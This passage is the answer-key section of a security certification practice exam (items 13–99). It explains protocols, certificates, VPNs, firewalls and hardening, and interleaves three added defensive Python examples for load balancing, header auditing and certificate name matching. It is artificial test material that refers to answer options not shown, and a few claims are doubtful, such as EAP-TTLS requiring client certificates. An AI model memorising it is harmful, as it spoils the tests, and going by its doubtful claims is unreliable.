13. C. Nadia should use Secure/Multipurpose Internet Mail Extensions (S/MIME), which supports asymmetric encryption, and should then use Danielle's public key to encrypt the email so that only Danielle can decrypt the messages and read them. Secure POP3 would protect messages while they're being downloaded but would not protect the content of the messages between servers.
14. B. SRTP is a secure version of the Real-Time Transport Protocol and is used primarily for Voice over IP (VoIP) and multimedia streaming or broadcast. SRTP, as currently implemented, does not fully protect packets, leaving RTP headers exposed, potentially exposing information that might provide attackers with information about the data being transferred.
15. C. Olivia should make her organization aware that a failure in one of the active nodes would result in less maximum throughput and a potential for service degradation. Since services are rarely run at maximum capacity, and many can have maintenance windows scheduled, this does not mean that the load balancers cannot be patched. There is nothing in this design that makes the load balancers more vulnerable to denial of service than they would be under any other design.
16. A. File Transfer Protocol Secure (FTPS) typically uses port 990 for implicit FTPS, and port 21, the normal FTP command port, is used for explicit FTPS. Port 22 is used for SSH, 433 was used for the Network News Transfer Protocol (NNTP), 1433 is used for Microsoft SQL, and port 20 is used for FTP.
17. A. Certificate stapling allows the server that is presenting a certificate to provide a more efficient way to check the revocation status of the certificate via the Online Certificate Status Protocol (OCSP) by including the OCSP response with the handshake for the certificate. This provides both greater security because clients know that the certificate is valid, and greater efficiency because they don't have to perform a separate retrieval to check the certificate's status. The rest of the options were made up and are not certificate stapling.
18. B. A registration authority, or RA, receives requests for new certificates as well as renewal requests for existing certificates. They can also receive revocation requests and similar tasks. An intermediate CA is trusted by the root CA to issue certificates. A CRL is a certificate revocation list.
19. C. Least connection-based load balancing takes load into consideration and sends the next request to the server with the least number of active sessions. Round robin simply distributes requests to each server in order, whereas weighted time uses health checks to determine which server responds the most quickly on an ongoing basis and then sends the traffic to that server. Finally, source IP hashing uses the source and destination IP addresses to generate a hash key and then uses that key to track sessions, allowing interrupted sessions to be reallocated to the same server and thus allowing the sessions to continue.
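To make the three schemes in answer 19 concrete, the following Python simulates a server pool in memory. This is example code written for this edit, not code from the book; the server names and client addresses are constructed, and weighted time is not simulated because it depends on live health checks.

```python
"""In-memory simulation of three load-balancing schemes: round robin,
least connections, and source-IP hashing. Added example; not from the book."""
import hashlib
from itertools import cycle
from typing import Dict, List


class Pool:
    """A pool of backend servers with per-server active-session counts."""

    def __init__(self, servers: List[str]):
        self.servers = list(servers)          # constructed server names
        self._rr = cycle(self.servers)        # iterator for round robin
        self.active: Dict[str, int] = {s: 0 for s in self.servers}

    def round_robin(self) -> str:
        """Hand each new request to the next server in listed order."""
        return next(self._rr)

    def least_connections(self) -> str:
        """Pick the server with the fewest active sessions (ties: listed order)."""
        return min(self.servers, key=lambda s: self.active[s])

    def source_ip_hash(self, src_ip: str, dst_ip: str) -> str:
        """Hash the source/destination pair so a client keeps landing on the
        same server, which is what lets an interrupted session resume there."""
        key = hashlib.sha256(f"{src_ip}->{dst_ip}".encode()).digest()
        return self.servers[int.from_bytes(key[:4], "big") % len(self.servers)]

    def open_session(self, server: str) -> None:
        self.active[server] += 1

    def close_session(self, server: str) -> None:
        self.active[server] -= 1


def sticky_assignments(pool: Pool, clients: List[str], vip: str) -> Dict[str, str]:
    """Map each client address to its server under source-IP hashing;
    asking twice for the same client gives the same answer."""
    return {c: pool.source_ip_hash(c, vip) for c in clients}


if __name__ == "__main__":
    pool = Pool(["web1", "web2", "web3"])
    print("round robin:", [pool.round_robin() for _ in range(5)])
    pool.open_session("web1"); pool.open_session("web1"); pool.open_session("web2")
    print("least connections picks:", pool.least_connections())
    # Constructed client and VIP addresses (RFC 5737 documentation ranges).
    print(sticky_assignments(pool, ["192.0.2.10", "192.0.2.11", "198.51.100.7"], "203.0.113.10"))
```

The least-connections pick changes as sessions open and close, so a real balancer recomputes it per request; the source-IP choice, by contrast, is a pure function of the addresses, which is exactly why it survives balancer restarts and interrupted sessions.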
20. A. IPSec's Authentication Header (AH) protocol does not provide data confidentiality because it secures only the header, not the payload. That means that AH can provide integrity and replay protection but leaves the rest of the data at risk. Matt should note this and express concerns about why the VPN is not using Encapsulating Security Protocol (ESP).
21. C. Michelle knows that POP3 runs on port 110 by default, and that TLS (via STARTTLS as an extension) allows POP3 clients to request a secure connection without needing to use the alternate port 995 used in some configurations. Port 25 is the default port for Simple Mail Transfer Protocol (SMTP), and IKE is used for IPSec.
22. A. A cloud access security broker (CASB) is a software tool or service that sits between an organization's on-premises network and a cloud provider's infrastructure. A CASB acts as a gatekeeper, allowing the organization to extend the reach of their security policies into the cloud.
23. A. Angela's company has deployed a version of Session Initiation Protocol (SIP) that doesn't use Transport Layer Security (TLS) to maintain confidentiality. She should switch to a SIP Secure (SIPS) implementation to protect the confidentiality of phone conversations. Vishing, or voice phishing; war dialing, which attempts to map all numbers for a phone service, typically to find modems; and denial of service are all less likely on a VoIP network, although they could occur.
24. B. The fastest way for Alaina to implement secure transport for her Network Time Protocol (NTP) traffic will typically be to simply tunnel the traffic via Secure Shell (SSH) from the NTP server to her Linux systems. An IPSec virtual private network (VPN) between devices will typically take more work to set up and maintain, although this could be scripted, and a Transport Layer Security (TLS) VPN would require additional work since it is intended for web traffic. RDP is the Remote Desktop Protocol and is primarily used for Windows systems and would not be a good choice. In most environments, however, NTP traffic does not receive any special security, and NTP sources are trusted to perform without exceptional security measures.
25. D. The safest and most secure answer is that Ramon should simply implement TLS for the entire site. Although TLS does introduce some overhead, modern systems can handle large numbers of simultaneous TLS connections, making a secure website an easy answer in almost all cases.
26. D. Although IP addresses for public servers and clients are not typically considered sensitive, the usernames, passwords, and files that the contractors use would be. Katie should consider helping her organization transition to a secure FTP or other service to protect her organization's customers and the organization itself.
27. D. Dynamic Host Configuration Protocol (DHCP) sniffing or snooping can be enabled to prevent rogue DHCP servers as well as malicious or malformed DHCP traffic. It also allows the capture and collection of DHCP binding information to let network administrators know who is assigned what IP address.
28. B. Aaron can use a wildcard certificate to cover all the hosts inside of a set of subdomains. Wildcards only cover a single level of subdomain, however, so if he purchased *.example.com, he could not use *.blog.example.com. A self-signed certificate will cause errors for visitors in most browsers and should not be used for production purposes. Extended validation (EV) certificates will not provide this functionality, and Secure Sockets Layer (SSL) is no longer in use with the switch to TLS for security reasons.
29. D. Root Guard can be set on a per-port basis to protect ports that will never be set up to be the root bridge for a VLAN. Since this shouldn't change regularly, it is safe to set for most ports in a network. Spanning tree is used to prevent loops, so disabling STP would actually make this problem more likely. Bridge IDs cannot be negative, and Bridge Protect was made up for this question.
30. C. A Personal Information Exchange (PFX) formatted file is a binary format used to store server certificates, as well as intermediary certificates, and it can also contain the server's private key. Privacy Enhanced Mail (PEM) files can contain multiple PEM certificates and a private key, but most systems store certificates and the key separately. Distinguished Encoding Rules (DER) format files are frequently used with Java platforms and can store all types of certificates and private keys. P7B, or PKCS#7, formatted files can contain only certificates and certificate chains, not private keys. For the exam, you should also know that a CER is a file extension for an SSL certificate file format used by web servers to help verify the identity and security of the site in question. SSL certificates are provided by a third-party security certificate authority such as VeriSign, GlobalSign, or Thawte.
A P12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. The P12 file contains both the private and the public key, as well as information about the owner (name, email address, etc.), all being certified by a third party. With such a certificate, a user can identify themselves and authenticate themselves to any organization trusting the third party.
31. D. A firewall has two types of rules. One type is to allow specific traffic on a given port. The other type of rule is to deny traffic. What is shown here is a typical firewall rule. Options A, B, and C are incorrect. The rule shown is clearly a firewall rule.
32. C. Many subscription services allow for data retrieval via HTTPS. Ted can subscribe to one or more threat feeds or reputation services, and then feed that information to an intrusion detection system (IDS), intrusion prevention system (IPS), next-generation firewall, or similar network security tool. Security Assertion Markup Language (SAML) is used to make assertions about identities and authorization, a VDI is a virtual desktop environment, and FDE is full-disk encryption.
33. B. Secure cookies are HTTP cookies that have the secure flag set, thus requiring them to only be sent via a secure channel like HTTPS. They are not stored in encrypted form or hashed, and cookie keys were made up for this question.
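Answers 5 and 33 both turn on what an HTTP response carries: the security-oriented headers (X-Content-Type-Options and its neighbours) and the cookie's Secure flag. The Python below audits a response for those, written for this edit rather than taken from the book. The two header sets are constructed samples, and the response is modelled as a plain dictionary with a single Set-Cookie header, which is a simplification of real responses that may carry several.

```python
"""Audit HTTP response headers for the security headers and cookie flags
from answers 5 and 33. Added example; not from the book."""
from typing import Dict, List

# Constructed sample responses (not captured from any real server).
WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Set-Cookie": "session=abc123; Path=/",
}

HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "X-Content-Type-Options": "nosniff",           # stops MIME sniffing
    "X-Frame-Options": "DENY",                      # stops framing/clickjacking
    "Content-Security-Policy": "default-src 'self'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
}


def cookie_flags(set_cookie: str) -> Dict[str, bool]:
    """Return which protective attributes a Set-Cookie value carries.
    Attribute names are case-insensitive per RFC 6265."""
    attrs = {part.strip().split("=")[0].lower() for part in set_cookie.split(";")[1:]}
    return {
        "secure": "secure" in attrs,
        "httponly": "httponly" in attrs,
        "samesite": "samesite" in attrs,
    }


def audit(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options missing or not 'nosniff' (MIME sniffing possible)")
    if "x-frame-options" not in h:
        findings.append("X-Frame-Options missing (page can be framed)")
    if "content-security-policy" not in h:
        findings.append("Content-Security-Policy missing")
    if "strict-transport-security" not in h:
        findings.append("Strict-Transport-Security missing (no HSTS)")
    if "set-cookie" in h:
        flags = cookie_flags(h["set-cookie"])
        if not flags["secure"]:
            findings.append("cookie lacks Secure flag (may be sent over plain HTTP)")
        if not flags["httponly"]:
            findings.append("cookie lacks HttpOnly flag (readable by page script)")
    return findings


if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(name, "->", audit(hdrs) or "no findings")
```

The same checks are what a web scanner reports under "missing security headers"; running them in code makes it easy to keep them as a regression test against a staging server's responses.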
34. D. Unlike IPSec's tunnel mode, IPSec transport mode allows different policies per port. The IP addresses in the outer header for transport mode packets are used to determine the policy applied to the packet. IPSec doesn't have a PSK mode, but WPA-2 does. IKE is used to set up security associations in IPSec but doesn't allow this type of mode setting.
35. A. WPS personal identification numbers (PINs) were revealed to be a problem in 2011, when a practical brute-force attack against WPS PIN setup modes was demonstrated. WPS suffers from a variety of other security issues and is not used for enterprise security. WPS remains in use in home environments for ease of setup.
36. C. The Online Certificate Status Protocol, or OCSP, is used to determine the status of a certificate. RTCP, CRBL, and PKCRL were all made up for this question.
37. C. Certificate revocation lists (CRLs) are designed specifically for revoking certificates. Since public keys are distributed via certificates, this is the most effective way to deauthorize a public key. Option A is incorrect. Simply notifying users that a key/certificate is no longer valid is not effective. Option B is incorrect. Deleting a certificate is not always possible and ignores the possibility of a duplicate of that certificate existing. Option D is incorrect. The registration authority (RA) is used in creating new certificates, not in revoking them.
38. C. Global Positioning System (GPS) data and data about local Wi-Fi networks are the two most commonly used protocols to help geofencing applications determine where they are. When a known Wi-Fi signal is gained or lost, the geofencing application knows it is within range of that network. GPS data is even more useful because it can work in most locations and provide accurate location data. Although Bluetooth is sometimes used for geofencing, its limited range means that it is a third choice. Cellular information would require accurate tower-based triangulation, which means it is not typically used for geofencing applications, and of course USB is a wired protocol.
39. A. The demilitarized zone (DMZ) is a zone between an outer firewall and an inner firewall. It is specifically designed as a place to locate public-facing servers. The outer firewall is more permissive, thus allowing public access to the servers in the DMZ. However, the inner firewall is more secure, thus preventing outside access to the corporate network.
40. C. The first step in security is hardening the operating system, and one of the most elementary aspects of that is turning off unneeded services. This is true regardless of the operating system. Although installing antimalware, implementing usage policies, and setting password reuse policies are all good practices, turning off unnecessary services is typically the first step in securing a system.
41. C. Knowledge-based authentication requires information that only the user is likely to know. Examples include things like previous tax payments, bill amounts, and similar information. Requesting a Social Security number is less secure and would only work for users in the United States. Federated identity via Google accounts does not meet this need because Google accounts do not have a user validation requirement. Finally, validation emails only prove that the user has access to an account that they provide, not that they are a specific individual.
42. A. A Transport Layer Security (TLS) VPN is frequently chosen when ease of use is important, and web applications are the primary usage mode. IPSec VPNs are used for site-to-site VPNs and for purposes where other protocols may be needed, because they make the endpoint system appear to be on the remote network.
43. A. Full-disk encryption (FDE) fully encrypts the hard drive on a computer. This is an effective method for ensuring the security of data on a computer. Trusted Platform Modules (TPMs) store keys and are used for boot integrity and other cryptographic needs and won't directly protect the data. Software-defined networking (SDN) is virtualized networking, and demilitarized zones (DMZs) are used to segment a network and won't affect this problem.
44. A. A DMZ (demilitarized zone) provides limited access to public-facing servers for outside users, but blocks outside users from accessing systems inside the LAN. It is a common practice to place web servers in the DMZ. A virtual LAN, or VLAN, is most often used to segment the internal network, routers direct traffic based on IP address, and a guest network allows internal users who are not employees to get access to the Internet.
45. D. Identity attributes are characteristics of an identity, including details like the individual's birth date, age, job title, address, or a multitude of other details about the identity. They are used to differentiate the identity from others and may also be used by the identity management system or connected systems in coordination with the identity itself. Roles describe the job or position an individual has in an organization, and factors are something you know, something you have, or something you are. Identifiers are not a common security or authentication term, although identity is.
46. D. The CN, or common name, for a certificate for a system is typically the fully qualified domain name (FQDN) for the server. If Megan was requesting a certificate for herself, instead of for a server, she would use her full name.
47. B. Physically partitioning your network is the physical equivalent of a virtual LAN, or VLAN. A VLAN is designed to emulate physical partitioning. Perimeter security does not segment the network. Security zones are useful but don't, by themselves, segment a network. Often a network is segmented, using physical partitions or VLANs, to create security zones. A firewall is meant to block certain traffic, not to segment the network, although a firewall can be part of a segmentation or security zone implementation.
48. D. Nelson is using a whitelisting (or allowed list) tool. Tools like this allow only specific applications to be installed and run on a system and often use hashes of known good applications to ensure that the applications are those that are permitted. A blacklisting (or blocked list) tool prevents specific applications or files from being used, stored, or downloaded to a system. Although antivirus and antimalware tools may have similar features, the most accurate answer here is whitelisting.
49. B. A stateful inspection firewall examines the content and context of each packet it encounters. This means that a stateful packet inspection (SPI) firewall understands the preceding packets that came from the same IP address, and thus the context of the communications. This makes certain attacks, like a SYN flood, almost impossible. Packet filtering firewalls examine each packet but not the context. Application-layer firewalls can use SPI or simple packet filtering, but their primary role is to examine application-specific issues. A common example is a web application firewall. A gateway firewall is simply a firewall at the network gateway. This does not tell us whether it is packet filtering or SPI.
50. A. Wireless network heat maps are used to show how strong wireless network signals are throughout a building or location. Scott can use a heat map like this to see where the wireless signal drops off or where interference may occur. A network diagram would show the logical layout of a network. A demilitarized zone (DMZ) is a network security zone that is exposed to a higher risk region, and a zone map is not a common security term.
51. B. A demilitarized zone (DMZ) is a separate subnet coming off the separate router interface. Public traffic may be allowed to pass from the external public interface to the DMZ, but it won't be allowed to pass to the interface that connects to the internal private network. A guest network provides visitors with Internet access. An intranet consists of internal web resources. Frequently companies put up web pages that are accessible only from within the network for items like human resources notifications, vacation requests, and so forth. A virtual LAN, or VLAN, is used to segment your internal network.
52. C. The application includes input validation techniques that are used to ensure that unexpected or malicious input does not cause problems with the application. Input validation techniques will strip out control characters, validate data, and perform a variety of other actions to clean input before it is processed by the application or stored for future use. This validation may help prevent buffer overflows, but other techniques described here are not used for buffer overflow prevention. String injection is actually something this helps to prevent, and schema validation looks at data to ensure that requests match a schema, but again this is a narrower description than the broad range of input validation occurring in the description.
53. C. WPA3 supports SAE, or simultaneous authentication of equals, providing a more secure way to authenticate that limits the potential for brute-force attacks and allows individuals to use different passwords. WPA is not as secure as WPA2, and WEP is the oldest, and least secure, wireless security protocol.
54. A. In order to stop attack traffic, an IPS needs to be deployed inline. Deployments that use a network tap receive a copy of the data without being in the flow of traffic, which makes them ideal for detection but removes the ability to stop traffic. Deploying as an intrusion detection system (IDS) instead of an IPS means that the system will only detect, not stop, attacks.
55. B. The correct answer is to use a sandboxed environment to test the malware and determine its complete functionality. A sandboxed system could be an isolated virtual machine (VM) or an actual physical machine that is entirely isolated from the network. Leaving the malware on a production system is never the correct approach. You should test or analyze the malware to determine exactly what malware it is, allowing you to respond to the threat properly. A honeypot is used for luring and trapping attackers, not for testing malware.
56. B. Hardening is the process of improving the security of an operating system or application. One of the primary methods of hardening a trusted OS is to eliminate unneeded protocols. This is also known as creating a secure baseline that allows the OS to run safely and securely. FDE is full-disk encryption, a SED is a self-encrypting drive, and baselining is the process of establishing security standards.
57. C. Although trust in the site is likely to be reduced because users will receive warnings, the actual underlying encryption capabilities will not change. Users will not be redirected to the certificate authority's site, and if they click past the warnings, users will be able to continue normally and with an encrypted connection.
58. D. Isaac knows that trusting client systems to be secure is not a good idea, and thus ensuring that validation occurs on a trusted client is not an appropriate recommendation. Ensuring that validation occurs on a trusted server, that client data is validated, and that data types and ranges are reasonable are all good best practices for him to recommend.
59. C. Trusted Platform Modules (TPMs) provide a random number generator, the ability to generate cryptographic keys, support for remote attestation as part of the boot process, as well as binding and sealing capabilities. They do not act as cryptographic processors to speed up Secure Sockets Layer (SSL) or Transport Layer Security (TLS) traffic.
60. B. Hashing is commonly used in databases to increase the speed of indexing and retrieval since it is typically faster to search for a hashed key rather than the original value stored in a database. Hashing is not a form of encryption, meaning that it is not used to encrypt stored data. Hashing is not used to obfuscate data or to substitute for sensitive data.
61. C. The correct answer is to only allow signed components to be loaded in the browser. Code signing verifies the originator of the component (such as an ActiveX component) and thus makes malware far less likely. Although host-based antimalware is a good idea, it is not the best remedy for this specific threat. Blacklists cannot cover all sites that are infected—just the sites you know about. And given that users on Hans's network visit a lot of websites, blacklisting is likely to be ineffective. Finally, if you block all active content, many websites will be completely unusable.
62. B. Zarmeena has implemented a preshared key, or PSK, authentication method. This means that if she needs to change the key because a staff member leaves, she will need to have every device update their passphrase. For larger deployments, enterprise authentication can connect to an authentication and authorization service, allowing each user to authenticate as themselves. This also provides network administrators with a way to identify individual devices by their authenticated user. Open networks do not require authentication, although a captive portal can be used to require network users to provide information before they are connected to the Internet.
63. A. EAP-FAST is specifically designed for organizations that want to quickly complete reconnections and does not require certificates to be installed at the endpoint device. EAP Tunneled Transport Layer Security (EAP-TTLS) requires client-side certificates; EAP-TLS requires mutual authentication, which can be slower; and Protected Extensible Authentication Protocol (PEAP) is similar to EAP-TTLS.
64. A. The correct answer is to implement a virtual desktop infrastructure (VDI). If all the desktops are virtualized, then from a single central location you can manage patches, configuration, and software installation. This single implementation will solve all the issues mentioned in the question. Restrictive policies are a good idea but are often difficult to enforce. Imaging workstations will affect only their original configuration; it won't keep them patched or prevent rogue software from being installed. Finally, strong patch management will address only one of the three concerns.
65. B. Deploying to multiple locations is part of a high availability strategy that ensures that losing a datacenter or datacenters in a single region, or loss of network connectivity to that region, will not take an infrastructure down. This does not provide greater resistance to insider attacks, lower costs, or vendor diversity.
66. B. A TLS-based VPN (often called an SSL-based VPN, despite SSL being outmoded) provides the easiest way for users to use VPN since it does not require a client. SSL VPNs also work only for specific applications rather than making a system appear as though it is fully on a remote network. HTML5 is not a VPN technology, but some VPN portals may be built using HTML5. Security Assertion Markup Language (SAML) is not a VPN technology. IPSec VPNs require a client or configuration and are thus harder for end users to use in most cases.
67. C. These particular web application attacks are best mitigated with proper input validation. Any user input should be checked for indicators of cross-site scripting (XSS) or SQL injection. Error handling is always important, but it won't mitigate these particular issues. Stored procedures can be a good way of ensuring SQL commands are standardized, but that won't prevent these attacks. Code signing is used for code that is downloaded from a web application to the client computer; it is used to protect the client, not the web application.
68. C. Isaac can configure a geofence that defines his corporate buildings and campus. He can then set up a geofence policy that will only allow devices to work while they are inside that geofenced area. Patch management, IP filtering, and network restrictions are not suitable solutions for this.
69. B. Fuzzing is a technique whereby the tester intentionally enters incorrect values into input fields to see how the application will handle it. Static code analysis tools simply scan the code for known issues, baselining is the process of establishing security standards, and version control simply tracks changes in the code—it does not test the code.
70. B. Although hardware security modules (HSMs) provide many cryptographic functions, they are not used for boot attestation. A TPM, or Trusted Platform Module, is used for secure boot attestation.
71. A. Cynthia should deploy Radio Frequency Identifier (RFID) cards, which can be read using contactless readers. RFID technology is common and relatively inexpensive, but without additional authentication, possession of a card is the only means of determining if someone is authorized to access a building or room. Wi-Fi is not used for contactless cards because of its power consumption and overhead. Magstripes require a reader rather than being contactless, and HOTP is a form of one-time password system.
72. B. Rate limiting and back-off algorithms both limit how quickly queries can be performed. Requiring authentication would restrict who could access the directory. Requiring LDAPS (Lightweight Directory Access Protocol over SSL) does not prevent enumeration, but it does provide security for the queried information as it transits networks.
73. D. A SAN, or Subject Alternate Name, certificate allows multiple hostnames to be protected by the same certificate. It is not a type of certificate for SAN storage systems. A SAN certificate could be self-signed, but that does not make it a SAN certificate, and of course the security organization SANS is not a certificate authority.
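Answers 28, 46, and 73 all come down to how a client decides whether a certificate's names cover the host it connected to: a CN holding the server's FQDN, a wildcard that covers exactly one label, and a SAN list holding several hostnames. The Python below implements that matching with the single-label wildcard rule from RFC 6125. It was written for this edit and is not the book's code; the hostnames are constructed, and the assumption that a SAN list, when present, takes precedence over the CN follows what current browsers do.

```python
"""Certificate hostname matching for CN, wildcard, and SAN names.
Added example; not from the book. Hostnames are constructed."""
from typing import Iterable, List


def name_matches(pattern: str, hostname: str) -> bool:
    """True if a certificate name (possibly '*.example.com') covers hostname.

    A wildcard stands for exactly one DNS label, so '*.example.com' covers
    'blog.example.com' but not 'www.blog.example.com' and not 'example.com'.
    The wildcard must be the entire leftmost label, and '*.com' is rejected.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or "*" in pattern[2:]:
        return False                      # malformed or overly broad wildcard
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]


def cert_covers(hostname: str, common_name: str, sans: Iterable[str] = ()) -> bool:
    """Decide whether a certificate with this CN and SAN list is valid for hostname.
    Assumption (matching modern browser behaviour): if any SAN dNSName entries
    exist, only they are consulted; the CN is used only as a legacy fallback."""
    names: List[str] = list(sans) or [common_name]
    return any(name_matches(n, hostname) for n in names)


if __name__ == "__main__":
    # Constructed certificate for answer 28's scenario.
    wildcard_cn = "*.example.com"
    for host in ("blog.example.com", "www.blog.example.com", "example.com"):
        print(f"{wildcard_cn} covers {host}: {name_matches(wildcard_cn, host)}")
    # Constructed SAN certificate for answer 73's scenario.
    sans = ["www.example.com", "api.example.com", "example.com"]
    print("SAN cert covers api.example.com:", cert_covers("api.example.com", "www.example.com", sans))
```

The second-level restriction is what forces a separate certificate (or a second SAN entry such as *.blog.example.com) for hosts one level deeper, and an explicit example.com entry for the bare domain.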
74. A. The correct answer is to assign digital certificates to the authorized users and to use these to authenticate them when logging in. This is an effective way to ensure that only authorized users can access the application. Although the remaining options are all good security measures, they are not the best way to authenticate the client and prevent unauthorized access to the application.
75. D. The correct answer is to first test patches. It is always possible that a patch might cause issues for one or more current applications. This is particularly a concern with applications that have a lot of interaction with the host operating system. An operating system patch can prevent the application from executing properly. But as soon as the patches are tested, a phased rollout to the company should begin. Automatic patching is not recommended in corporate environments because a patch could possibly interfere with one or more applications—thus, a managed patch deployment process is implemented that requires more administrative time but avoids outages due to patches with issues in an organization's specific environment. Having individual users patch their own machines is a bad idea and will lead to inconsistent patching and the application of untested patches. Delegating patch management to managers instead of IT staff can lead to problems, too, due to varying skill sets and practices.
76. B. Although wireless analyzers provide in-depth information about Service Set Identifiers (SSIDs), signal strength, and protocol versions, the Remote Authentication Dial-In User Service (RADIUS) or Kerberos version number for the backend authentication servers is not something that they will typically be able to provide.
77. B. The correct answer is to turn off any remote access to such devices that is not absolutely needed. Many peripheral devices come with SSH (Secure Shell), Telnet, or similar services. If you are not using them, turn them off. Many peripherals don't have disks to encrypt, making full-disk encryption (FDE) a less useful choice. Fuzz testing is used to test code, not devices, and peripherals are unlikely to support digital certificates in most cases.
78. C. Manual code review is a type of static code review where reviewers read through source code to attempt to find flaws in the code. Dynamic code review requires running the code, Fagan testing is a formal code review process that works through multiple phases of the development process, and fuzzing is a form of dynamic inspection that sends unexpected values to a running program.
79. C. Samantha should place her public SSH key in the .ssh directory in her home directory on the remote server. Private keys should never be outside of your control, and unlike many Linux configurations, SSH keys are not kept in the /etc/ directory.
80. C. The correct answer is to use static code analysis. Memory leaks are usually caused by failure to deallocate memory that has been allocated. A static code analyzer can check to see if all memory allocation commands (malloc, alloc, etc.) have a matching deallocation command. Fuzzing involves entering data that is outside expected values to see how the application handles it. Stress testing involves testing how a system handles extreme workloads. Normalization is a technique for deduplicating a database.
81. D. Load balancers provide a virtual IP, or VIP. Traffic sent to the VIP is directed to servers in the pool based on the load-balancing scheme that that pool is using—often a round-robin scheme, but other versions that include priority order and capacity tracking or ratings are also common. The load balancer's IP address is normally used to administer the system, and individual IP addresses for the clustered hosts are shielded by the load balancer to prevent traffic from consistently going to those hosts, thus creating a failure or load point.
82. D. In a well-implemented password hashing scheme, unique random bits called salts are added to each password before they are hashed. This makes generating a rainbow table or otherwise brute-forcing hashes for all of the passwords stored in a database extremely time-consuming. The remaining options were made up and are not actual security terms.
83. A. The correct answer is to use Secure Shell (SSH). This protocol is encrypted. SSH also authenticates the user with public key cryptography. Telnet is insecure and does not encrypt data. RSH, or Remote Shell, sends at least some data unencrypted and is also insecure. SNMP, or Simple Network Management Protocol, is used to manage a network and is not used for remote communications.
84. A. Resource-based policies are attached to resources and determine who has access to a resource, such as a group of sysadmins or developers, and what actions they can perform on the resource. Cloud services have different terms for monitoring their resource usage; these terms may vary from service to service.
85. A. Networked sensor appliances are deployed in many datacenters to gather information about temperature and humidity as part of the environmental monitoring system. Fire detection and suppression systems are not typically mounted in racks, and power quality and reliability are measured by PDUs (power distribution units), UPS (uninterruptable power supplies), and other power infrastructure.
86. C. Secure IMAP's default port is TCP 993. Laurel can easily guess that the system offers a TLS-protected version of IMAP for clients to use to retrieve email messages. The default port for secure POP is 995, and for secure SMTP the default port is 587. S/MIME does not have a specific port, as it is used to encrypt the content of email messages.
87. C. Ad hoc wireless networks operate in a point-to-point topology. Infrastructure mode access points work in a point-to-multipoint topology. Star and bus models are used in wired networks.
88. C. Only using code that is digitally signed verifies the creator of the software. For example, if a printer/multifunction device (MFD) driver is digitally signed, this gives you confidence that it really is a printer driver from the vendor it purports to be from, and not malware masquerading as a printer driver. Signed software gives you a high degree of confidence that it is not malware but does not provide a guarantee. For example, the infamous Flame virus was signed with a compromised Microsoft digital certificate. Digital signing of software has no effect on patch management. Finally, digitally signed software will not execute faster or slower than unsigned software.
89. D. The Security+ exam refers to password managers as password vaults. Samantha should recommend a password vault that will allow her users to generate, store, and use many passwords securely. None of the other options are good advice for password use and storage.
90. A. Port security filters by MAC address, allowing whitelisted MAC addresses to connect to the port and blocking blacklisted MAC addresses. Port security can be static, using a predetermined list, or dynamic, allowing a specific number of addresses to connect, or it can be run in a combination mode of both static and dynamic modes.
91. C. Authentication headers (AHs) provide complete packet integrity, authenticating the packet and the header. Authentication headers do not provide any encryption at all, and authentication headers authenticate the entire packet, not just the header.
92. B. A split horizon DNS implementation deploys distinct DNS servers for two or more environments, ensuring that those environments receive DNS information appropriate to the DNS view that their clients should receive. Domain Name System Security Extensions (DNSSEC) is a set of DNS security specifications to help protect DNS data. DMZ DNS and DNS proxying are not design patterns or common terms used in the security or networking field.
93. A. Network taps copy all traffic to another destination, allowing traffic visibility without a device inline. They are completely passive methods of getting network traffic to a central location. Port mirroring would get all the traffic to the network-based intrusion prevention system (NIPS) but is not completely passive. It requires the use of resources on switches to route a copy of the traffic. Incorrect switch configurations can cause looping. Configuring loop detection can prevent looped ports. Putting a network IPS on every segment can be very expensive and require extensive configuration work. Option D is incorrect. This is not the assignment. Setting up a NIPS on each segment would also dramatically increase administrative efforts.
94. C. Federating RADIUS allows organizations to permit users from other partner organizations to authenticate against their home systems, and then be allowed onto the local organization's network. An example of this is the eduroam federation used by higher education institutions to permit students, faculty, and staff to use college networks anywhere they go where eduroam is in place. Preshared keys are determined by the location organization and would not permit enterprise credentials from other organizations to be used. OpenID is used for web authentication, and 802.11q is a trunking protocol.
95. C. Context-aware authentication can take into account information like geolocation to ensure that the devices can only be logged into when they are inside of the facility's boundaries. That means the devices will only be useful on-site and can help protect the data and applications on the devices. Neither PINs nor biometrics can do this, and content-aware authentication was made up for this question.
96. B. A TPM, or Trusted Platform Module, is a secure cryptoprocessor used to provide a hardware root of trust for systems. TPMs enable secure boot and boot attestation capabilities, and include a random number generator, the ability to generate cryptographic keys for specific uses, and the ability to bind and seal data used for processes the TPM supports.
97. B. Internet key exchange (IKE) is used to set up security associations (SAs) on each end of the tunnel. The security associations have all the settings (i.e., cryptographic algorithms, hashes) for the tunnel. IKE is not directly involved in encrypting or authenticating. IKE itself does not establish the tunnel—it establishes the SAs.
98. A. A root certificate is the base certificate that signs an entire certificate chain. A common security practice to protect these incredibly important certificates is to keep the root certificate and CA offline to prevent the potential of compromise or exposure. Machine/computer, user, and email certificates are deployed and used throughout organizations and, since they are used on a frequent basis, aren't likely to be kept offline.
99. A. The NIPS is not seeing the traffic on that network segment. By implementing port mirroring, the traffic from that segment can be copied to the segment where the NIPS is installed. Installing a network IPS on the segment would require additional resources. This would work but is not the most efficient approach. Nothing in this scenario suggests that the NIPS is inadequate. It just is not seeing all the traffic. Finally, isolating the segment to its own VLAN would isolate that network segment but would still not allow the NIPS to analyze the traffic from that segment.
